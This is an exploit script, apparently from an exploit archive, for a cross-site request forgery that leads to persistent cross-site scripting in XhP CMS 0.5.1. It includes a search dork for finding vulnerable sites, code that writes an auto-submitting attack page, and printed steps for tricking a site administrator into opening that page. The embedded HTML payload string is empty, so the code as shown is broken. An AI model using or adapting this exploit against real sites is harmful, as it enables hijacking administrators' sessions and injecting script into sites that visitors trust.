# Exploit Title: XhP CMS 0.5.1 - Cross-Site Request Forgery to Persistent Cross-Site Scripting # Exploit Author: Ahsan Tahir # Date: 19-10-2016 # Software Link: https://sourceforge.net/projects/xhp/ # Vendor: https://sourceforge.net/projects/xhp/ # Google Dork: inurl:Powered by XHP CMS # Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial # Website: www.ahsan-tahir.com # Category: webapps # Version: 0.5.1 # Tested on: [Kali Linux 2.0 | Windows 8.1] # Email: mrahsan1337@gmail.com import os import urllib if os.name == 'nt': os.system('cls') else: os.system('clear') banner = ''' +-==-==-==-==-==-==-==-==-==-==-==-==-==-=-=-=+ | __ ___ ____ ____ __ __ ____ | | \ \/ / |__ | _ \ / ___| \/ / ___| | | \ /| '_ \| |_) | | | | |\/| \___ \ | | / \| | | | __/ | |___| | | |___) | | | /_/\_\_| |_|_| \____|_| |_|____/ | | > XhP CMS 0.5.1 - CSRF to Persistent XSS | | > Exploit Author & Script Coder: Ahsan Tahir| +=====-----=====-----======-----=====---==-=-=+ ''' def xhpcsrf(): print banner url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): ")) csrfhtmlcode = ''' ''' % url print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created." print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n") extension = ".html" name = raw_input(" Filename: ") filename = name+extension file = open(filename, "w") file.write(csrfhtmlcode) file.close() print(" [+] Your exploit is saved as %s")%filename print(" [+] Further Details:\n [!] The code saved in %s will automatically submit without\n any user interaction\n [!] To fully exploit, send the admin of this site a webpage with\n the above code injected in it, when he/she will open it the\n title of their website will be\n changed to an XSS payload, and then\n go to %s and hit ALT+SHIFT+Z on your keyboard, boom! XSS will pop-up!") %(filename, url) print("") xhpcsrf()